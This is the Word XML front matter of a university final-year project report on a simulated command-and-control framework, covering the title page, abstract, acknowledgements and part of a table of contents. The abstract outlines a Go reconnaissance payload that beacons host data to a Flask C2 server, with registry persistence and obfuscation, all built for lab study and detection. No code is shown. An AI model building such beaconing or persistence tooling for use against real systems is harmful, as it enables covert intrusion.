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23085" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>SETU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452C091A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>South East Technological University</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4565F96B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="741E68F1" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DACD50B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="7A75EB9F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bachelor of Science (Honours) in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DD30CB" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Cybercrime and IT Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A5A34D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="0576ACB9" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Final Year Project — Project Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CCF07A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="353245CC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="64AC75E7" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="4734141B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Command and Control Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F42CF2" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Educational Series</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396D1149" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="283D0167" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="476B84C4" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="02D11D76" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="2B63EB92" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33510042" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="4583A1A4" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>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2C0DF0" w14:paraId="05386C7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65DCFD39" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Student Name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9EB5C14" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Jake Powell Langstaff</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="63052794"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60A50A95" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Student ID</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3693E6AC" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>C00287662</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="3B0CC8F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57CC4376" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Course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244F8E2" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>BSc (Hons) Cybercrime and IT Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="7CCB707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7486CE3F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Supervisor</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72A34643" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Joseph Kehoe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C0DF0" w14:paraId="24FBA22E"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23A5CC36" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Status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A9804C4" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Complete — All 4 Phases Delivered</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6489836B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A838F5E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
      <w:pPr>
        <w:sectPr w:rsidR="002C0DF0">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="741FC769" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc226583739"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Abstract</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="0232052E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53FD56E7" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="38FBC7AB" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This project designs and documents a simulated Command and Control (C2) framework for educational purposes within a controlled laboratory environment. The primary aim is to understand how real-world malware establishes reconnaissance, persistence, and communication channels, and to identify corresponding defensive countermeasures at each stage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E27BD3E" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="4593D05C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>A lightweight reconnaissance payload has been developed in Go (Golang) and compiled as a static Windows .exe binary. The payload enumerates host-level data across three progressively capable versions, ultimately beaconing collected data to a Flask-based C2 server every 60 seconds. Registry persistence ensures the payload survives reboots. The project is structured around the Cyber Kill Chain model, with every technique mapped to MITRE ATT&amp;CK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AD3548" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="59E1FF85" w14:textId="787FE9FC" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>A companion Flask web application serves as the project documentation portal, hosting versioned source files, lesson write-ups, and technical analysis across four completed phases: Foundation, Reconnaissance, C2 Server, and Obfuscation. A blue team analysis section maps each technique to its real-world detection signature.</w:t>
      </w:r>
      <w:r w:rsidR="00636351">
        <w:t xml:space="preserve"> As a bonus extension, the documentation website was containerised using Docker and deployed to a live AWS Kubernetes cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E146E87" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="00E10963" w14:textId="0599B83F" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All development was performed on Windows 10/11 using Visual Studio Code. All detonation and analysis </w:t>
      </w:r>
      <w:r w:rsidR="00ED54EA">
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> performed in an isolated Windows VM with Sysmon logging enabled. No live systems were targeted at any stage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5431D45C" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="16ACAC83" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="7962C96B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD6180A" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc226583740"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Acknowledgements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="79650F5F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="350BA440" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="1AA90517" w14:textId="2340700A" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I would like to thank my project supervisor, Joseph Kehoe, for his guidance and feedback throughout the development of this project. His advice on structuring </w:t>
      </w:r>
      <w:r w:rsidR="00ED54EA">
        <w:t xml:space="preserve">of the c2 website and recommendation of payload language was invaluable. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61351507" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="4C7486EF" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I would also like to acknowledge the open-source security community — the maintainers of Sysmon, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinternals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, and the MITRE ATT&amp;CK knowledge base — whose publicly available tools and documentation made the educational analysis possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D694D0D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="3BBDB77A" w14:textId="6EC3B4C0" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Finally, thanks to SETU for providing the academic context in which this project was completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78348F4B" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="136A377F" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:p w14:paraId="6CDFB15D" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA43FC2" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc226583741"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="242EE2CD" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35BF8679" w14:textId="77777777" w:rsidR="002C0DF0" w:rsidRDefault="002C0DF0"/>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Table of Contents"/>
        <w:id w:val="597837962"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="0F96AC0C" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText>TOC \h \o "1-3"</w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc226583739" w:history="1">
            <w:r w:rsidR="00ED54EA" w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Abstract</w:t>
            </w:r>
            <w:r w:rsidR="00ED54EA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00ED54EA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00ED54EA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583739 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00ED54EA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00ED54EA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00ED54EA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00ED54EA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="225304E7" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583740" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Acknowledgements</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583740 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65EFE2C3" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583741" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Table of Contents</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583741 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3EDB52AB" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583742" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Glossary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583742 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7EFF3F50" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583743" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1. Introduction</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583743 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="212CCE0F" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583744" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2. Background and Theory</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583744 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4EE9E1CD" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583745" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1  The Cyber Kill Chain</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583745 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D8852D4" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583746" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2  MITRE ATT&amp;CK Framework</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583746 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="71DE9BA7" w14:textId="77777777" w:rsidR="00ED54EA" w:rsidRDefault="00ED54EA">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc226583747" w:history="1">
            <w:r w:rsidRPr="00D50EC4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3. System Design</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc226583747 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
